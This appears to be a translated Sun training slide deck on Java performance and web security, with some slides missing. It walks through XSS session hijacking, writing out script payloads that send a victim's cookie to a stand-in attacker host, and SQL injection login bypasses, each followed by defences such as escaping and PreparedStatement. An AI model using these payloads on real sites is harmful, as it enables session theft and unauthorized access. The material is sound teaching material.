3. Web performance overview
• Every program is bound by three system limits:
> CPU speed
> Memory
> Input/output
Sun Confidential: Internal Only 3
4. CPU-bound programs
• Focus on algorithms that improve the program's efficiency
5. Memory
• Java has garbage collection
> Does that mean objects can be allocated without a second thought?
> Does the system create too many short-lived objects?
• Large objects waste memory
> Object creation, garbage collection
6. Input/output
• I/O always slows a program down
> Disk access (file reads and writes, logging, ...)
> Database access (insert, delete, query, lookup, ...)
> Network access (reverse DNS lookups, ...)
7. From 1 to 100
• Write a program that displays, in text mode:
HOW DO YOU DO
8. How do you do
for(int i = 1; i < 100; i++) {
    System.out.print(i + "+");   // one I/O call per iteration
}
System.out.println(100);
• Two mistakes commonly made inside loops:
> Unnecessary input/output
> Unnecessary object construction
9. How do you do
• Improved output
String output = "";
for(int i = 1; i < 100; i++) {
    output = output + i + "+";   // each concatenation creates a new String
}
output += 100;
System.out.println(output);      // a single I/O call
10. How do you do
• Object reuse (1)
StringBuffer output = new StringBuffer();   // one buffer reused across the loop
for(int i = 1; i < 100; i++) {
    output.append(i);
    output.append("+");
}
output.append(100);
System.out.println(output);
11. How do you do
• Object reuse (2)
StringBuffer output = new StringBuffer(300);   // default capacity is only 16 characters
for(int i = 1; i < 100; i++) {
    output.append(i);
    output.append("+");
}
output.append(100);
System.out.println(output);
12. How do you do
• Threading issue
StringBuilder output = new StringBuilder(300);   // StringBuilder requires JDK 5.0 or later
for(int i = 1; i < 100; i++) {
    output.append(i);
    output.append("+");
}
output.append(100);
System.out.println(output);
35. Code analysis
• http://pmd.sourceforge.net/
• PMD scans Java source code and looks for potential problems like:
> Possible bugs - empty try/catch/finally/switch statements
> Dead code - unused local variables, parameters and private methods
> Suboptimal code - wasteful String/StringBuffer usage
> Overcomplicated expressions - unnecessary if statements, for loops that could be while loops
> Duplicate code - copied/pasted code means copied/pasted bugs
40. XSS: Session hijacking
• Example: a search feature echoes the user's query string back to the page
Could not find any documents including 'foo'
41. XSS: Session hijacking
Search: <b>foo</b>
Page source: Could not find any documents including '<b>foo</b>'
Rendered: Could not find any documents including 'foo'
42. XSS: Session hijacking
Search: <script language='javascript'>alert(document.cookie)</script>
Page source: Could not find any documents including '<script language='javascript'>alert(document.cookie)</script>'
43. XSS: Session hijacking
Attacker: www.hahaorz.com
Request: http://www.xssorz.com/search?query=foo
Target site: www.xssorz.com
44. XSS: Session hijacking
Attacker: www.hahaorz.com
Request: http://www.xssorz.com/search?query=foo<script language='javascript'>document.location="http://www.hahaorz.com/foo" +document.cookie</script>
Target site: www.xssorz.com
45. XSS: Session hijacking
Attacker: www.hahaorz.com
Request (URL-encoded): http://www.xssorz.com/search?query=foo%3Cscript+language%3D%27javascript%27%3Edocument.cookies%3C%2Fscript%3E
Target site: www.xssorz.com
46. XSS: Session hijacking
Attacker: www.hahaorz.com
Link: http://www.xssorz.com/search?query%3Cscript+language%3D%27javascript%27%3Edocument.cookies%3C%2Fscript%3E
Target site: www.xssorz.com
Victim: www.e04orz.com
47. XSS: Session hijacking
Attacker: www.hahaorz.com
<a href=http://www.xssorz.com/search?query%3Cscript+language%3D%27javascript%27%3Edocument.cookies%3C%2Fscript%3E>Lots of pretty-girl pictures here ^o^</a>
Target site: www.xssorz.com
Victim: www.e04orz.com
48. XSS: Session hijacking
Attacker: www.hahaorz.com
Link text seen by the victim: Lots of hunk pictures here ^o^
Target site: www.xssorz.com
Victim: www.e04orz.com
49. XSS: Session hijacking
Attacker: www.hahaorz.com
Link text seen by the victim: Lots of hunk pictures here ^o^
Cookie received by the attacker: JSESSIONID=0146B416F…
Target site: www.xssorz.com
Victim: www.e04orz.com
50. XSS: Phishing
<script language='javascript'>document.location="http://www.svn.com/foo" +document.cookie</script>
Message boards, discussion forums
http://java.sun.com/forum
51. XSS: Phishing
<script language='javascript'>document.location="http://www.svn.com/foo" +document.cookie</script>
Message boards, discussion forums
http://java.svn.com/forum (look-alike of java.sun.com)
52. XSS
• Filter request data
> < becomes &lt;
> > becomes &gt;
> <script>
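As an added example (Python standing in for the deck's Java; not code from the slides), the search echo of slides 40 to 42 rendered with entity encoding applied where the query is written into HTML, plus an HttpOnly session cookie, which keeps JSESSIONID out of document.cookie, the channel the hijacking slides rely on. Function names and the cookie attributes are assumptions.

```python
import html

# Added example, not the deck's code: the search page's echo with the untrusted
# query string entity-encoded at the point where it is placed into the HTML.
def render_search_result(query):
    # & < > " ' become entities, so a pasted <script> tag is displayed as text
    # rather than executed by the browser.
    safe = html.escape(query, quote=True)
    return "Could not find any documents including '" + safe + "'"

def is_inert(rendered):
    # Defensive check on the output: no raw tag or attribute delimiters survive.
    return "<" not in rendered and ">" not in rendered and '"' not in rendered

def session_cookie_header(session_id):
    # HttpOnly hides JSESSIONID from document.cookie (what slides 44-49 read);
    # Secure limits it to HTTPS. This complements output encoding, not replaces it.
    return "Set-Cookie: JSESSIONID=" + session_id + "; Path=/; HttpOnly; Secure"
```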
53. Injection attacks
• SQL Injection
Name: [ ] Password: [ ]
Statement statement = connection.createStatement();
String queryString = "SELECT * FROM USER_TABLE WHERE USERNAME='" +
    username + "' AND PASSWORD='" + password + "';";
ResultSet resultSet = statement.executeQuery(queryString);
Query template: "SELECT * FROM USER_TABLE WHERE USERNAME='" + username + "' AND PASSWORD='" + password + "';"
54. SQL Injection
Name: caterpillar Password: 123456
Statement statement = connection.createStatement();
String queryString = "SELECT * FROM USER_TABLE WHERE USERNAME='" +
    username + "' AND PASSWORD='" + password + "';";
ResultSet resultSet = statement.executeQuery(queryString);
Resulting query: "SELECT * FROM USER_TABLE WHERE USERNAME='caterpillar' AND PASSWORD='123456';"
55. SQL Injection
Name: caterpillar Password: ' OR '1'='1
Statement statement = connection.createStatement();
String queryString = "SELECT * FROM USER_TABLE WHERE USERNAME='" +
    username + "' AND PASSWORD='" + password + "';";
ResultSet resultSet = statement.executeQuery(queryString);
Resulting query: "SELECT * FROM USER_TABLE WHERE USERNAME='caterpillar' AND PASSWORD='' OR '1'='1';"
The condition is always true
56. SQL Injection
Name: caterpillar';# Password: (empty)
Statement statement = connection.createStatement();
String queryString = "SELECT * FROM USER_TABLE WHERE USERNAME='" +
    username + "' AND PASSWORD='" + password + "';";
ResultSet resultSet = statement.executeQuery(queryString);
Resulting query: "SELECT * FROM USER_TABLE WHERE USERNAME='caterpillar';# AND PASSWORD='' OR '';"
# is a comment marker: the rest of the line is ignored
57. SQL Injection
• Use PreparedStatement
PreparedStatement stmt = conn.prepareStatement(
    "SELECT * FROM USER_TABLE WHERE USERNAME=? AND PASSWORD=?");
stmt.setString(1, username);   // values are bound to the placeholders,
stmt.setString(2, password);   // never parsed as SQL
ResultSet resultSet = stmt.executeQuery();
• Filter request data
> Single quote '
> Double quote "
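As an added example (Python with sqlite3 standing in for the deck's JDBC code; the table and its rows are constructed here), the concatenated query of slides 53 to 55 beside the placeholder form from this slide, checked with the deck's caterpillar/123456 credentials and its ' OR '1'='1 password. The ;# case from slide 56 uses MySQL comment syntax and is not replayed here.

```python
import sqlite3

# Constructed stand-in for the deck's USER_TABLE (added example, not the deck's code).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USER_TABLE (USERNAME TEXT, PASSWORD TEXT)")
    conn.execute("INSERT INTO USER_TABLE VALUES ('caterpillar', '123456')")
    conn.execute("INSERT INTO USER_TABLE VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def login_concat(conn, username, password):
    # Mirrors the slides' Statement + string concatenation: the user's input is
    # spliced into the SQL text, so a quote in the password changes the query.
    query_string = ("SELECT * FROM USER_TABLE WHERE USERNAME='" + username
                    + "' AND PASSWORD='" + password + "';")
    rows = conn.execute(query_string).fetchall()
    return len(rows) > 0

def login_prepared(conn, username, password):
    # Mirrors the PreparedStatement fix: ? placeholders with the values bound
    # separately, so the password is compared as data and never parsed as SQL.
    rows = conn.execute(
        "SELECT * FROM USER_TABLE WHERE USERNAME=? AND PASSWORD=?",
        (username, password)).fetchall()
    return len(rows) > 0
```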
58. Automated security testing tools
• Bring security concepts and tools into the development process
> Apply security scanning tools during the coding phase
> Run penetration (permeation) tests during the test phase
> Harden products that are already in production
59. Automated security testing tools
• Watchfire Web AppScan
• Acunetix
• Fortify